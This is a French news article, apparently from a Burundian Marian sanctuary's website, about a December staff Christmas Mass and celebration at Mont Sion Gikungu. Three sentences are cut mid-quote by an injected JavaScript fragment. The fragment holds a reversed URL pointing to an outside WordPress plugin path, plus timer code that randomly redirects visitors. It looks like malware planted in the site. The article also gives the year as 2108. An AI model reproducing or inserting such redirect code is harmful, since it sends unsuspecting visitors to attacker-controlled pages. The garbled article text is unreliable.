Le Sanctuaire Marial de Schoenstatt Mont Sion Gikungu anticipe pour souhaiter la joyeuse fête de Noël et les meilleurs vœux du nouvel an 2019 à ces employés, ce vendredi 21 décembre 2108.
Les cérémonies ont débuté à 11heures par une Messe d’action de grâce. Le Père Léonce NTAKARUTIMANA qui l’a dite a signalé que ce sont les remerciements : « Nous venons dire merci au Seigneur qui nous a protégé tout au long de cette année et qui nous a aidé à accomplir nos tâches. »
Il a invité dans son homélie les concernés de prendre Marie Mère comme un bon exemple : « Nous sommes appelés à répondre par « oui » comme Marie pour que la volonté du Seigneur soit faite. Notre « oui » c’est le remerciement au Seigneur pour tout ce que nous sommes. »
Il a rappelé que tout ce que nous faisons, nous devons le faire pour la gloire de Dieu : « Travaillons pour le Seigneur et non pas pour nos employeurs. Nous devons satisfaire le bon Dieu au lieu de le faire pour être vus par les hommes. »
Il a rappelé que c’est Dieu qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne tout : « C’est Dieu qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne de l’emploi, travaillons alors avec amour et humilité comme la Vierge Marie afin de satisfaire le Seigneur. »
Il a terminé en souhaitant joie de Noël à tous : « Joyeux Noël ! Que cette année vous soit spéciale. »
Qu’en est-il après l’Eucharistie ?
C’est l’agape fraternelle qui a suivi la messe. Dans la salle Saint Vincent Palotti, les travailleurs sont heureux de partager quelque chose. Les discours n’ont pas manqué à être prononcés. Le Père Jean Bernard MAZURU, Chef du Personnel a manifesté sa joie. « Nous sommes heureux parce que Dieu nous a protégés durant toute cette année, lui qui nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés la vie et qui nous a aidés à vaquer à nos activités. »
Le Père Jean Bernard n’a pas oublié d’accueillir les nouveaux employés, féliciter les mamans qui ont reçu des bébés et remercier vivement les employés parce que généralement dit-il, ils ont été fidèles. Il a ajouté : « Nous commençons l’année de travail, je vous invite à travailler assidûment et former une famille comme les frères et sœurs qui travaillent au Sanctuaire Marial ». Ils leurs a promis de rester toujours avec eux et il leur a souhaité plein succès dans leurs travaux et les meilleures vœux du nouvel an.
Quant à celui qui a représenté le staff de Mont Sion, Monsieur Fidèle BARINAKANDI, a manifesté sa gratitude : « Nous vous remercions pour ce geste d’amour et nous vous souhaitons nous aussi Joyeux Noël et Meilleurs Vœux. Nous sommes vraiment contents et notre promesse est d’aller faire de notre mieux en accomplissant notre tâche. »
Le Père Econome, Claude JERIA, a dit que la fête de Noël n’est pas une simple fête comme certains le considèrent. « C’est une solennité ». Selon lui, la fête de Noël nous aide à vivre heureux dans la pauvreté à l’exemple de la sainte famille de Nazareth. « Dieu a manifesté son amour dans la fête de Noël et nous sommes appelés à vivre cet amour en étant généreux » a- t-il signalé.
Les cérémonies ont été clôturées dans la joie par la distribution des cadeaux et la bénédiction finale.
Brigitte IRAKOZE